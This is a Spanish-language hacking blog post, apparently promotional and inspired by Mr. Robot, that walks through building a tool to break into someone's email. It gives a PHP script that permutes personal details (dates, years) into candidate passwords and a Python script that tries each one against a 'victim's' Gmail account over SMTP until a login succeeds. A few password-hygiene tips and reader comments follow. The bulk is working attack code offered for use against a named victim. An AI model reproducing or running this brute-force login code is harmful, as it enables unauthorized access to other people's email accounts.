🔥Adquiere tu membresía:  acceso a todos los cursos, videos eliminados, contenidos protegidos, manuales y más. >> Ver Más

Hackeando cualquier correo electrónico como en MR.ROBOT – HackWise EP4

En el episodio S01EP01 de la serie de Mr.robot observamos como hackea a su psiquiatra Krista accediendo a su correo electrónico para conocer un poco más acerca de su vida. En esta ocasión analizamos y realizamos los códigos necesarios para poder crear la herramienta mepscrk.py (Mr.Ebola Password cracker) inspirada en el episodio de Mr.robot

En la serie se ve que utilizan la herramienta ELPSCRK. (ELliot’s PaSsword CRacKer) de la siguiente manera:

elpscrk -list pswList.list-add Dylan; June 3rd, Stonehenge

Video – Hackeando cualquier correo electrónico como en MR.ROBOT:

Código de ELPSCRK. (ELliot’s PaSsword CRacKer):

Como podemos observar elpscrk, permite ingresar una lista de argumentos para que el sistema calcule contraseñas en base a esa información.

Lo primero que necesitaremos es crear g3n3r4t0r.php el cual nos permitirá generar posibles contraseñas con la información que demos de alta en el arreglo $arr, en este ejemplo ingresamos ’09’, ’08’, ‘1986’.

<?php
function pc_permute($items, $perms = array()) {
    if (empty($items)) { 
        echo join('', $perms) . "<br/>";
    } else {
        for ($i = count($items) - 1; $i >= 0; --$i) {
             $newitems = $items;
             $newperms = $perms;
             list($foo) = array_splice($newitems, $i, 1);
             array_unshift($newperms, $foo);
             pc_permute($newitems, $newperms);
         }
    }
}

$arr = array('09', '08', '1986');

pc_permute($arr);
?>

<!-- 
09 08 1986
09 1986 08
08 09 1986
08 1986 09 
1986 08 09 
1986 09 08
-->

Una vez que generamos todas las posibles contraseñas, pasamos a crear mepscrk.py el Mr.Ebola Password cracker que nos permitirá intentar conectar con el servicio smtp.gmail.com por el puerto 587. El sistema intentara contraseña por contraseña almacenada en pswd.list hasta dar con la correcta.

#                       ___.          .__          
#   ____________    ____\_ |__   ____ |  | _____   
#  /     \_  __ \ _/ __ \| __ \ /  _ \|  | \__  \  
# |  Y Y  \  | \/ \  ___/| \_\ (  <_> )  |__/ __ \_
# |__|_|  /__|    /\___  >___  /\____/|____(____  /
#       \/        \/   \/    \/                 \/ 
#                                                     .___
# ___________    ______ ________  _  _____________  __| _/
# \____ \__  \  /  ___//  ___/\ \/ \/ /  _ \_  __ \/ __ | 
# |  |_> > __ \_\___ \ \___ \  \     (  <_> )  | \/ /_/ | 
# |   __(____  /____  >____  >  \/\_/ \____/|__|  \____ | 
# |__|       \/     \/     \/                          \/ 
#                             __                 
#   ________________    ____ |  | __ ___________ 
# _/ ___\_  __ \__  \ _/ ___\|  |/ // __ \_  __ \
# \  \___|  | \// __ \\  \___|    <\  ___/|  | \/
#  \___  >__|  (____  /\___  >__|_ \\___  >__|   
#      \/           \/     \/     \/    \/       


import smtplib

class bcolors:
    OK = '\033[92m'
    FAIL = '\033[91m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    UNDERLINE = '\033[4m'

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

print bcolors.BOLD + "Welcome to, mr.ebola Email Cracker based on MR.ROBOT - S01E01 11m03s" + bcolors.ENDC
print bcolors.BOLD + "TRYING WITH PASSWORDS IN: psw.list" + bcolors.ENDC

user = raw_input("Enter the victim's email address: ")
passwfile = "psw.list"
passwfile = open(passwfile, "r")

for password in passwfile:
	try:
		smtpserver.login(user, password)
		print bcolors.UNDERLINE + "Password Found: %s"  % password + bcolors.ENDC
		break;
	except smtplib.SMTPAuthenticationError:
		print bcolors.FAIL + "Password Incorrect: %s" % password + bcolors.ENDC

El contenido del archivo psw.list deberá contener algo como esto, respetando el salto de linea para que mepscrk.py funcione correctamente.

09081986
09198608
08091986
08198609 
19860809 
19860908

De encontrar la contraseña veremos la siguiente pantalla:

cracking email password

Tips para evitar este tipo de ataque:

#1 Contraseña dificil de adivinar
No utilices datos personales en tu contraseña

#2 Contraseña segura
Una contraseña segura hoy en día suele ser una contraseña alfa numérica, con números o letras de mínimo 8 dígitos y con por lo menos algún carácter especial.

#3 Autenticación de dos pasos
La idea consiste en ingresar algo que solo tu conoces (Una contraseña) más algo que tu tienes (Código generado desde tu celular) para ingresar a tu correo.

Espero que les haya gustado este episodio de HackWise, no olviden suscribirse a el canal en youtube aquí y seguirme en todas mis redes sociales.

¿Tienes alguna mejor idea para realizar esto? Comentas en este post !

Hasta la próxima 😀

11 thoughts on "Hackeando cualquier correo electrónico como en MR.ROBOT – HackWise EP4"

  1. y en donde lo descargamos?

    1. Los códigos están disponibles en está página, no son descargables, son scripts que tienes que utilizar en tu computadora.

  2. El codigo.. sta completo?

    1. Así es, el código está disponible para miembros

  3. hola puse a prueba la herramienta y en el archivo .lisp añadi la contraseña correcta y arroja todas como incorrectas alguien sabe porque pasa eso

  4. si compro la membresia en el video enseñas como usar los codigos y hacer el proceso ?

  5. donde has conseguido esas letras de mr ebola password cracker dimelo porfavor

  6. Hola, me hice una cuenta y me sigue saliendo esto:

    “Este contenido se encuentra protegido
    Disponible solo para usuarios con membresía Wiser Elite, Adquiere tu mebresía aquí.”

    ¿Qué puedo hacer? 🙁

    1. comprar la membrensia x 150 pesos

  7. Y el codigo? Donde esta?

  8. y si el password es de numeros y letras?

Deja un comentario

Adquiere tu Membresía Anual Wiser

Adquiere tu Membresía Anual Wiser y adquiere grandes beneficios

Más información